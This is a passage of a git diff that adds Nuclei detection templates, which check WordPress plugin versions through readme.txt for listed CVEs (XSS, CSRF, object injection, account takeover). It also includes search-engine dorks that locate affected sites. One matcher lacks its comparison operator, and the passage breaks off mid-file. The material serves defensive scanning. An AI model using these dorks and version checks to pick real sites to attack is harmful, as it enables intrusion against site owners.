./poc/other/ip-loc8-d856c75c4a7648c0d697b0a5cc81d96d.yaml +./poc/other/ip-loc8.yaml ./poc/other/ip-metaboxes-4fa05536816e1ae75e1be41c33811c1b.yaml ./poc/other/ip-metaboxes-e3bf78734b958fe7f3d31b8732e511ff.yaml ./poc/other/ip-metaboxes.yaml @@ -97951,6 +98046,7 @@ ./poc/other/post-duplicator.yaml ./poc/other/post-expirator.yaml ./poc/other/post-from-frontend-c82ef12d6b5c5faa12b5f5ba337b063e.yaml +./poc/other/post-from-frontend.yaml ./poc/other/post-gallery-39b262f792a3a1c198ad39a4f18f8716.yaml ./poc/other/post-gallery-4a111471c3b69e18591d99e8e2c2ccf0.yaml ./poc/other/post-gallery-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -98329,6 +98425,7 @@ ./poc/other/presto-player-3eea4d75664c28dc358ae7e345ae04c6.yaml ./poc/other/presto-player.yaml ./poc/other/pretix-widget-2e623f2a16d7d25a76b4a155be463a14.yaml +./poc/other/pretix-widget.yaml ./poc/other/pretty-link-10cb82ad4b969588ac514969ffb96038.yaml ./poc/other/pretty-link-17fd0e83c56c2d35239cad96f5e19695.yaml ./poc/other/pretty-link-28b2427be030be6512e6825b9e3313d2.yaml @@ -98468,6 +98565,7 @@ ./poc/other/product-category-tree-757e3679c00640ae93bcb1882d372e63.yaml ./poc/other/product-category-tree-989cb4bd490429502c57b1c4116d3006.yaml ./poc/other/product-category-tree.yaml +./poc/other/product-customizer-light-6ecff9673f13aa763d6821bb8cdcdfc8.yaml ./poc/other/product-designer-3f8e1fd53ed8ad42b6005ebef8f40d79.yaml ./poc/other/product-designer-c5bf36635810c0bfffe56b1515830f1c.yaml ./poc/other/product-designer.yaml @@ -99922,6 +100020,7 @@ ./poc/other/restaurant-solutions-checklist-b153f43461ec7d665d82838ed178c6d9.yaml ./poc/other/restaurant-solutions-checklist.yaml ./poc/other/restaurantconnect-reswidget-96627c77b1356a068ee9c31d365f5757.yaml +./poc/other/restaurantconnect-reswidget.yaml ./poc/other/restrict-categories-83c1081ec3f5b4bb37eb4cfd14c464b3.yaml ./poc/other/restrict-categories.yaml ./poc/other/restrict-content-2204b8e66e9a7189953f04581efbb315.yaml @@ -100341,6 +100440,7 @@ ./poc/other/rss-feed-reader-b8c180e9afbfd946ec957b8884660fa5.yaml ./poc/other/rss-feed-reader.yaml ./poc/other/rss-feed-widget-42c825d60cbf2b54b2e3c6a8833dcfa2.yaml +./poc/other/rss-feed-widget-80a0a36ea063283e29ed3c5e77408ead.yaml ./poc/other/rss-feed-widget-c442aab7c95e1be767a882848e68a0ed.yaml ./poc/other/rss-feed-widget.yaml ./poc/other/rss-for-yandex-turbo-25ba50902493a7e536f84e758470fb78.yaml @@ -100662,6 +100762,7 @@ ./poc/other/sb-child-list-0b2143dfb86dd824a1b7aed5ba06f945.yaml ./poc/other/sb-child-list.yaml ./poc/other/sb-random-posts-widget-f10e2da5d4a8325de799114542f5e5f6.yaml +./poc/other/sb-random-posts-widget.yaml ./poc/other/scalable-vector-graphics-svg-7ebcc23c4b2581aa9b5947fe9c79480d.yaml ./poc/other/scalable-vector-graphics-svg.yaml ./poc/other/scarlet-3f3b8c7ed0767e56cd182742c3ecd621.yaml @@ -101408,6 +101509,7 @@ ./poc/other/shortcode-ninja-cf0700fbf5aeb160f77c17cbe496451e.yaml ./poc/other/shortcode-ninja.yaml ./poc/other/shortcode-support-for-elementor-templates-86007466d60d35eb3535e395e097d15f.yaml +./poc/other/shortcode-support-for-elementor-templates.yaml ./poc/other/shortcode-to-display-post-and-user-data-79c6104f9ee2600b9a1867ba7b40ef7c.yaml ./poc/other/shortcode-to-display-post-and-user-data-7a1a2f73242ac0686fe520e5ede2edf9.yaml ./poc/other/shortcode-to-display-post-and-user-data-886a9335ebeb7587968d35be6ac6b245.yaml @@ -101644,6 +101746,7 @@ ./poc/other/simple-banner-f668ae3f8428fae3d5ef6f93b05e3154.yaml ./poc/other/simple-banner.yaml ./poc/other/simple-baseball-scoreboard-e529a333b3a6e1902acac19785d96ef8.yaml +./poc/other/simple-baseball-scoreboard.yaml ./poc/other/simple-basic-contact-form-0a3334ba85dfaa09809571ecc4a249ff.yaml ./poc/other/simple-basic-contact-form-4c415b6cc7e8935ac6062a1922941a41.yaml ./poc/other/simple-basic-contact-form-4c6a710b1814cde7e69d69c139947279.yaml @@ -102548,6 +102651,7 @@ ./poc/other/smokesignal-plugin.yaml ./poc/other/smokesignal.yaml ./poc/other/smooth-gallery-replacement-0fd82a28074cfda8fbc1af75d08471c4.yaml +./poc/other/smooth-gallery-replacement.yaml ./poc/other/smooth-page-scroll-updown-buttons-649ee2228cc1d9f00c5e2c7e0e161086.yaml ./poc/other/smooth-page-scroll-updown-buttons-a958888557a04d544d5b6773b0972010.yaml ./poc/other/smooth-page-scroll-updown-buttons.yaml @@ -103524,6 +103628,7 @@ ./poc/other/suitecrm-installer.yaml ./poc/other/suitecrm.yaml ./poc/other/sukebeinyaasi.yaml +./poc/other/suki-sites-import-4694ec357c3309f764352c01cbaa3638.yaml ./poc/other/sully-2ec7f0fa1e4f401a3f8a884fd9854aa9.yaml ./poc/other/sully-36fef0319891e42f249d20dafcbc17a8.yaml ./poc/other/sully-3c7a81376b49d084d5da38f31f5c7ec9.yaml @@ -103598,6 +103703,7 @@ ./poc/other/supervpn-panel-10576.yaml ./poc/other/supervpn-panel-10577.yaml ./poc/other/supervpn-panel.yaml +./poc/other/support-chat-18aa420081599222efb2bc477402197c.yaml ./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml ./poc/other/support-genix-lite.yaml ./poc/other/support-incident-tracker.yaml @@ -103965,6 +104071,7 @@ ./poc/other/tajer-897b9a6ef99ebb108706f45fd054c941.yaml ./poc/other/tajer.yaml ./poc/other/talkback-secure-linkback-protocol-34b64e53b1af5d56803a233d1fc15efb.yaml +./poc/other/talkback-secure-linkback-protocol.yaml ./poc/other/tallykit.yaml ./poc/other/tamronos iptv系统.yaml ./poc/other/tamronos-user-creation.yaml @@ -107821,6 +107928,7 @@ ./poc/other/woo-easy-duplicate-product-77102a310cbbfd0129222bc051ae381d.yaml ./poc/other/woo-easy-duplicate-product-d3f0c12550da352a4f10bcc722ae4373.yaml ./poc/other/woo-easy-duplicate-product.yaml +./poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml ./poc/other/woo-edit-templates-f07f921d3ab929108946de3552c80163.yaml ./poc/other/woo-edit-templates.yaml ./poc/other/woo-email-control-5372aede0855022f991604fe288cd8bc.yaml @@ -108044,6 +108152,7 @@ ./poc/other/woo-seo-addon.yaml ./poc/other/woo-shipping-display-mode-2d3075ac9da71d5c985dc0ed024b9ec4.yaml ./poc/other/woo-shipping-display-mode.yaml +./poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml ./poc/other/woo-shipping-dpd-baltic-5c365a05388cfbae523bd5865cabbaba.yaml ./poc/other/woo-shipping-dpd-baltic-76df9e8ddfe10df6d9b34458a945079a.yaml ./poc/other/woo-shipping-dpd-baltic.yaml @@ -112555,6 +112664,7 @@ ./poc/remote_code_execution/woo-ecommerce-tracking-for-google-and-facebook.yaml ./poc/remote_code_execution/woo-parcel-pro-3995439370cffe55d99117aedb670a79.yaml ./poc/remote_code_execution/woo-parcel-pro-3f72e246b9fdb2cf96f9586da902cfb6.yaml +./poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml ./poc/remote_code_execution/woo-parcel-pro-fd91eb3145bab903f7fb280f1c730688.yaml ./poc/remote_code_execution/woo-parcel-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/woo-parcel-pro-plugin.yaml @@ -114017,6 +114127,7 @@ ./poc/search/acf-better-search-92227a17c1f36e5836a835a2974c3c9c.yaml ./poc/search/acf-better-search.yaml ./poc/search/acf-images-search-and-insert-e47a6204cdbedbb402c7f2651a014300.yaml +./poc/search/acf-images-search-and-insert.yaml ./poc/search/add-search-to-menu-233e0e7dddff66b680fc0229fdeedb16.yaml ./poc/search/add-search-to-menu-2c53ca508bd85217f4d77d498bac7c2b.yaml ./poc/search/add-search-to-menu-340412de430ddac89cc6028eb15c91fd.yaml @@ -115550,6 +115661,7 @@ ./poc/social/social-share-buttons-by-supsystic-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/social-share-buttons-by-supsystic-plugin.yaml ./poc/social/social-share-buttons-by-supsystic.yaml +./poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml ./poc/social/social-sharing-toolkit-8b0db7156873702bdc12cab20cd09570.yaml ./poc/social/social-sharing-toolkit-8b4ed2648dec5a06344145d95bd1776e.yaml ./poc/social/social-sharing-toolkit-ffc7184d9598acd2b7bdc8e43212020e.yaml @@ -117209,6 +117321,7 @@ ./poc/sql/CVE-2024-0954-760e16e786dbe11046e07b3f65eb13db.yaml ./poc/sql/CVE-2024-0956-dec8fc1767837ea369e30ca1ecdb9c30.yaml ./poc/sql/CVE-2024-0972-d643db18054b1dd86be768803ada8c1e.yaml +./poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml ./poc/sql/CVE-2024-1046-bfec7425f9f443824c4a93511a98dbc5.yaml ./poc/sql/CVE-2024-1047-68db58e698228b42f923e1452fb395bc.yaml ./poc/sql/CVE-2024-1049-0e66fa189b7475aa8bef5ee2db21f9f7.yaml @@ -117844,6 +117957,7 @@ ./poc/sql/CVE-2024-8675-2579ae41909742bfecbbc60a59db1710.yaml ./poc/sql/CVE-2024-8720-de75ddb341cf2c3da9270fff1b0efdb8.yaml ./poc/sql/CVE-2024-8727-ae87d4f5a52dd5aba777d7e1dc1848db.yaml +./poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml ./poc/sql/CVE-2024-8795-3332712efb7806b1aa3560db5575e663.yaml ./poc/sql/CVE-2024-8800-24174edddc1bdbea66c89ab990604404.yaml ./poc/sql/CVE-2024-8802-e9f6f582db2e920a7bf95437ee8218f9.yaml @@ -117861,6 +117975,7 @@ ./poc/sql/CVE-2024-9222-6d3211dbe3c26f975c3e1ae606af3b47.yaml ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml +./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml ./poc/sql/CVE-2024-9521-4587dbff6356b28863ebeee1f7d9133f.yaml ./poc/sql/CVE-2024-9529-db7341b5bf720c2f45daca0a630903ae.yaml ./poc/sql/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml @@ -122278,6 +122393,7 @@ ./poc/sql/woo-orders-tracking-599c2c8548a1c37ed2db250ad779415b.yaml ./poc/sql/woo-parcel-pro-3995439370cffe55d99117aedb670a79.yaml ./poc/sql/woo-parcel-pro-3f72e246b9fdb2cf96f9586da902cfb6.yaml +./poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml ./poc/sql/woo-paylate-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/woo-pdf-invoice-builder-504e502e118b95434dbdceb7501ab1fe.yaml ./poc/sql/woo-pensopay-09982b78f0903db47082c498edd9651a.yaml @@ -126360,6 +126476,7 @@ ./poc/web/synology-webstation.yaml ./poc/web/tasmota-config-webui.yaml ./poc/web/telecash-ricaricaweb-5a6ad4dd0471307888a0107a11a5c1b7.yaml +./poc/web/telecash-ricaricaweb.yaml ./poc/web/tenda-web-master.yaml ./poc/web/tenweb-speed-optimizer-43a480a0284beb0ba94273bcb7d7d4fb.yaml ./poc/web/tenweb-speed-optimizer-488c74b6c954e7bcfe6f3ba9396145d7.yaml @@ -127465,6 +127582,7 @@ ./poc/wordpress/dynamic-font-replacement-4wp.yaml ./poc/wordpress/easy-google-analytics-for-wordpress-06ea0706f943f940d87398ff6563b526.yaml ./poc/wordpress/easy-google-analytics-for-wordpress.yaml +./poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml ./poc/wordpress/easy-social-share-buttons-for-wordpress-c87965eee3695d8be4e6a23762ab2103.yaml ./poc/wordpress/easy-social-share-buttons-for-wordpress-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/easy-social-share-buttons-for-wordpress-e57e5e233dc34a562c51780afac2f8cc.yaml @@ -128119,6 +128237,7 @@ ./poc/wordpress/mappress-google-maps-for-wordpress.yaml ./poc/wordpress/mapster-wp-maps-461ea30f42ad696e5f4caf7ead9ea09c.yaml ./poc/wordpress/mapster-wp-maps.yaml +./poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml ./poc/wordpress/mastercurrency-wp-3f25e87948bf1b2c81b3ba4c73f155ea.yaml ./poc/wordpress/mastercurrency-wp.yaml ./poc/wordpress/memberful-wp-fbab98bc9cf332dc0c1f693a01cfd26c.yaml @@ -132857,6 +132976,7 @@ ./poc/wordpress/wp-security-scan.yaml ./poc/wordpress/wp-sendfox-bdf4a98ac2cb1ef89f4c3b97512ede7f.yaml ./poc/wordpress/wp-sendfox.yaml +./poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml ./poc/wordpress/wp-sendgrid-mailer-ff9d6ca33f3c466181325c5fa6a03923.yaml ./poc/wordpress/wp-sendgrid-mailer.yaml ./poc/wordpress/wp-sentry-c2ab687b9bdad07c3c9b84f3521d750c.yaml diff --git a/poc/auth/publishpress-authors.yaml b/poc/auth/publishpress-authors.yaml new file mode 100644 index 0000000000..c0464409f8 --- /dev/null +++ b/poc/auth/publishpress-authors.yaml @@ -0,0 +1,59 @@ +id: publishpress-authors + +info: + name: > + Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors <= 4.7.1 - Insecure Direct Object Reference to Authenticated (Author+) Arbitrary User Email Update and Account Takeover + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0506137-82e3-4988-9b23-370465a866c0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/publishpress-authors/" + google-query: inurl:"/wp-content/plugins/publishpress-authors/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,publishpress-authors,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/publishpress-authors/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "publishpress-authors" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.7.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml b/poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml new file mode 100644 index 0000000000..ba06bdbb7f --- /dev/null +++ b/poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a + +info: + name: > + Flat UI Button <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via flatbtn Shortcode + author: topscoder + severity: low + description: > + The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10014 + metadata: + fofa-query: "wp-content/plugins/flat-ui-button/" + google-query: inurl:"/wp-content/plugins/flat-ui-button/" + shodan-query: 'vuln:CVE-2024-10014' + tags: cve,wordpress,wp-plugin,flat-ui-button,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flat-ui-button/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flat-ui-button" + part: body + + - type: dsl + dsl: + - compare_versions(version, '1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml b/poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml new file mode 100644 index 0000000000..dd575da452 --- /dev/null +++ b/poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10040-ee8183e3617c63ac904e5e710044f265 + +info: + name: > + Infinite-Scroll <= 2.6.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The Infinite-Scroll plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.2. This is due to missing or incorrect nonce validation on the process_ajax_edit and process_ajax_delete function. This makes it possible for unauthenticated attackers to make changes to plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4045575a-35f0-46e5-afb7-93eee9be3a97?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-10040 + metadata: + fofa-query: "wp-content/plugins/infinite-scroll/" + google-query: inurl:"/wp-content/plugins/infinite-scroll/" + shodan-query: 'vuln:CVE-2024-10040' + tags: cve,wordpress,wp-plugin,infinite-scroll,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/infinite-scroll/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "infinite-scroll" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml b/poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml new file mode 100644 index 0000000000..76c407c39c --- /dev/null +++ b/poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92 + +info: + name: > + Edit WooCommerce Templates <= 1.1.2 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + The Edit WooCommerce Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-10049 + metadata: + fofa-query: "wp-content/plugins/woo-edit-templates/" + google-query: inurl:"/wp-content/plugins/woo-edit-templates/" + shodan-query: 'vuln:CVE-2024-10049' + tags: cve,wordpress,wp-plugin,woo-edit-templates,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-edit-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-edit-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml b/poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml new file mode 100644 index 0000000000..a0b9248e03 --- /dev/null +++ b/poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29 + +info: + name: > + Click to Chat – WP Support All-in-One Floating Widget <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wpsaio_snapchat Shortcode + author: topscoder + severity: low + description: > + The Click to Chat – WP Support All-in-One Floating Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsaio_snapchat shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c13600-0791-4ade-9c28-f43f164aedae?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10055 + metadata: + fofa-query: "wp-content/plugins/support-chat/" + google-query: inurl:"/wp-content/plugins/support-chat/" + shodan-query: 'vuln:CVE-2024-10055' + tags: cve,wordpress,wp-plugin,support-chat,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/support-chat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "support-chat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml b/poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml new file mode 100644 index 0000000000..e20b351ba8 --- /dev/null +++ b/poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3 + +info: + name: > + RSS Feed Widget <= 2.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via rfw-youtube-videos Shortcode + author: topscoder + severity: low + description: > + The RSS Feed Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rfw-youtube-videos shortcode in all versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10057 + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:CVE-2024-10057' + tags: cve,wordpress,wp-plugin,rss-feed-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml b/poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml new file mode 100644 index 0000000000..002cb7c8d1 --- /dev/null +++ b/poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10078-ac3355172629b828c0c05e8735d48816 + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions + author: topscoder + severity: low + description: > + The WP Easy Post Types plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 1.4.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options and posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d12c4b1c-23d0-430f-a6ea-0a3ab487ed10?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-10078 + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:CVE-2024-10078' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml b/poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml new file mode 100644 index 0000000000..6c56e809b2 --- /dev/null +++ b/poc/cve/CVE-2024-10079-79020560113c9d55758318e5701b73cf.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10079-79020560113c9d55758318e5701b73cf + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Subscriber+) PHP Object Injection + author: topscoder + severity: low + description: > + The WP Easy Post Types plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.4 via deserialization of untrusted input from the 'text' parameter in the 'ajax_import_content' function. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d038f1a2-4755-417f-965d-508b57c05738?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10079 + metadata: + fofa-query: "wp-content/plugins/easy-post-types/" + google-query: inurl:"/wp-content/plugins/easy-post-types/" + shodan-query: 'vuln:CVE-2024-10079' + tags: cve,wordpress,wp-plugin,easy-post-types,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-post-types/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-post-types" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml b/poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml new file mode 100644 index 0000000000..1ee5db2403 --- /dev/null +++ b/poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe + +info: + name: > + WP Easy Post Types <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Meta + author: topscoder + severity: low + description: > + The WP Easy Post Types plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post meta in versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 